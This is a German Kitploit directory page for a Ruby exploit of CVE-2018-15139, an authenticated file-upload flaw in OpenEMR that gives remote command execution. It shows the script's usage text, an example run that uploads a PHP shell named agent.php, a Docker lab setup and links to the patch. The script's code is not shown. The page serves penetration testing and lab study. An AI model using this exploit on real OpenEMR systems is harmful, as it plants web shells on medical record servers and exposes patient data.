Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
exploit-CVE-2018-15139 — OpenEMR < 5.0.1.4 - (Authenticated) Datei-Upload - Remote-Befehlsausführung | Kitploit
Tools/GitHubGitHub/sec-it/exploit-cve-2018-15139
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubsec-it/exploit-cve-2018-15139

exploit-CVE-2018-15139

OpenEMR < 5.0.1.4 - (Authenticated) Datei-Upload - Remote-Befehlsausführung

Repository anzeigen
22vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

OpenEMR CVE-2018-15139 Exploit

OpenEMR < 5.0.1.4 - (Authentifiziert) Dateiupload - Remote-Befehlsausführung

Exploit für CVE-2018-15139.

Verwendung

root@kitploit:~
$ ruby exploit.rb -h
OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution

Source: https://github.com/sec-it/exploit-CVE-2019-14530

Usage:
  exploit.rb exploit <url> <filename> <username> <password> [--debug]
  exploit.rb -h | --help

Options:
  <url>       Root URL (base path) including HTTP scheme, port and root folder
  <filename>  Filename of the shell to be uploaded
  <username>  Username of the admin
  <password>  Password of the admin
  --debug     Display arguments
  -h, --help  Show this screen

Examples:
  exploit.rb exploit http://example.org/openemr shell.php admin pass
  exploit.rb exploit https://example.org:5000/ shell.php admin pass

Beispiel

root@kitploit:~
$ ruby exploit.rb exploit http://172.24.0.3 agent.php admin pass
[+] File uploaded:
http://172.24.0.3/sites/default/images/agent.php

Voraussetzungen

  • httpx
  • docopt.rb

Beispiel mit gem:

root@kitploit:~
bundle install
# or
gem install httpx docopt

Docker-Bereitstellung der anfälligen Software

Warnung: Diese Einrichtung ist selbstverständlich nicht für den Produktionseinsatz geeignet!

root@kitploit:~
$ sudo docker-compose up

Die Berechtigungen des Upload-Ordners sind im offiziellen OpenEMR-Docker-Image fehlerhaft, daher ist es erforderlich, eine Verbindung zum Container herzustellen und die Berechtigungen zu korrigieren, z.B.:

root@kitploit:~
$ sudo docker exec -ti exploit-cve-2018-15139_openemr_1 /bin/sh
$ chmod u+w /var/www/localhost/htdocs/openemr/sites/default/images/

Referenzen

  • Zielsoftware: OpenEMR
    • Homepage: https://www.open-emr.org/
    • Source: https://github.com/openemr/openemr
    • Docker: siehe docker-compose.yml
    • Anfällige Version: < 5.0.1.4 (das bedeutet bis 5.0.1.3)
    • Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485

Dies ist eine verbesserte Neufassung von EDB-49998.

Die Sicherheitslücke wurde von Project Insecurity entdeckt.

Analyse des ursprünglichen Exploits und der Sicherheitslücke:

  • OpenEMR patches serious vulnerabilities uncovered by Project Insecurity
Tool herunterladen